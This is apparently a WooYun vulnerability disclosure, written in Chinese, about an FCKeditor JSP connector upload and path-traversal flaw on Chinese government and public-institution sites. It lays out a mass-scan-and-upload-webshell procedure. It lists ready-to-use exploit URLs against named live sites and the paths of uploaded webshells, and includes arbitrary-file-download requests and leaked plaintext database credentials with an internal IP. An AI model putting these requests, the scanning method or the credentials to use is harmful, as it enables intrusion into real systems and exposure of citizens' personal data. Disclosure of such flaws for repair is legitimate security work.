WooYun.org

jsp版FCK席卷一些小政府站点
一直做梦可以有这样一个工具，自动搜索漏洞，然后实现利用，然后提交乌云，然后自动刷rank。可惜呀，一直没有...
但是对于重复的问题，重复的漏洞，还是可以用工具来实现的...那样多省事，正所谓工具不是万能，但至少工具很省力
多个站点使用的fck编辑器存在漏洞
fck本身不用多说了，直接参考
WooYun: 中国联通某省站点任意文件上传
http://zone.wooyun.org/content/395
简单来说:使用有漏洞的jsp fck，攻击者可以不需要验证，直接上传任意文件，到任意目录（windows 是在站点本身分区）
这个漏洞扫描和利用都很简单，直接写个小脚本跑一跑就可以跑出很多....
大致过程:
1)获得jsp站点的域名列表（可以是从百度根据关键字抓取的，或者自己整理的）
2）对每个域名发送请求/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=file&CurrentFolder=/
3）正则匹配返回结果的<CurrentFolder path="/" url="，判断是否存在fck编辑器
4）如果存在fck直接使用post，上传一个shell
5）判断shell上传是否成功，输出shell路径...
通过这个小的脚本发现很多站点使用这个fck，因此，整理一下政府站点，拿感觉稍微有价值的，刷刷rank:
站点1：北京人力资源和社会保障局
fck: http://www.bjld.gov.cn/LDJAPP//FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=Image&CurrentFolder=/
shell:http://www.bjld.gov.cn/LDJAPP/UserFiles/Image/shell.jsp
简单分析:
没有仔细看代码,简单看一下，上面数据很多，站点很多
D:\bea815\user_projects\domains\mydomain\config.xml
而且数据库连接权限很大，很多sa
("jdbc:odbc:ldj","sa","cns");
jdbc1.url=jdbc:jtds:sqlserver://192.168.1.37:1433/middledata
jdbc1.username=sa
jdbc1.password=ldj
也许政府都是sa...
简单看一下 这个页面http://www.bjld.gov.cn/LDJAPP/tools/crm.jsp
很是无语，10几w的数据就这样显示出来？干啥用的？
目测这个内网有很多站点,如http://www.bjld.gov.cn/cardbiz 社会保障卡，不敢想想所有帝都人信息可能都在里面，
无论你在哪个公司，因为你都会发社会保障卡...
不敢进去看了,就到这了...
还有一个任意文件下载:
http://www.bjld.gov.cn/LDJAPP/zcfg/downloadfile.jsp?dest=../../WEB-INF/web.xml&src=web.xml
站点2：福建省人口计生委公众网
本来不想说这个了，因为已经在http://zone.wooyun.org/content/395写了当时的测试过程，但是这个还是
很有代表性，而且站点漏洞不补怕担责任，还是提醒站点修复吧。毕竟上面还有防篡改设备，还是做的不错。利用FCK漏洞向任意目录上传，导致了防篡改设备失效。
FCK列目录功能:
http://www.fjjsw.gov.cn/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
查看当前目录下的所有文件和文件夹，并且FCK没有对CurrentFolder参数进行限制，导致../实现路径回退
两次回退到站点根目录:
http://www.fjjsw.gov.cn/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/../../
继续向上回溯发现，站点放到tomcat的默认目录下。而且仅对当前站点进行了防篡改保护。导致向其他目录上传
shell即可绕过防篡改软件。
本地提交:
http://www.fjjsw.gov.cn/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=Image&CurrentFolder=/../../../lybbs/
获得shell.
http://www.fjjsw.gov.cn/lybbs/shellnew.jsp
站点3:杭州大学生就业网
存在任意文件下载
http://www.zjhz.lss.gov.cn/lemis/netweb/detail/download.jsp?url=/&filename=WEB-INF/web.xml
找到fck位置:
http://www.zjhz.lss.gov.cn/lemis/managenetweb/info/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=Image&CurrentFolder=/
直接上传文件，但是发现上传后shell不能访问，程序对访问路径进行了判断，只要在允许的几个目录才可以访问，
从上面的下载漏洞可知，netweb/detail/目录下是可以访问没有限制的，因此直接利用FCK的跨目录上传即可，构造
上传请求:
http://www.zjhz.lss.gov.cn/lemis/managenetweb/info/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=Image&CurrentFolder=/../../netweb/detail/
即可跨目录上传，获得shell路径
http://www.zjhz.lss.gov.cn/lemis/netweb/detail/shellnew.jsp
杭州劳动保障等站点在该域名下...
不一一说了问题都是一样的:
成都财政局会计网
http://www.cdkjw.org/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=Image&CurrentFolder=/
佛山的虚拟主机,上面小站点挺多
http://www.fsyigong.com/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=Image&CurrentFolder=/
广州天河人民法院
http://www.gzthfy.gov.cn/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=Image&CurrentFolder=/
中国少儿基金
http://baoxian.cctf.org.cn//FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=Image&CurrentFolder=/
就写这些吧，好像还有，不知道放到哪里了...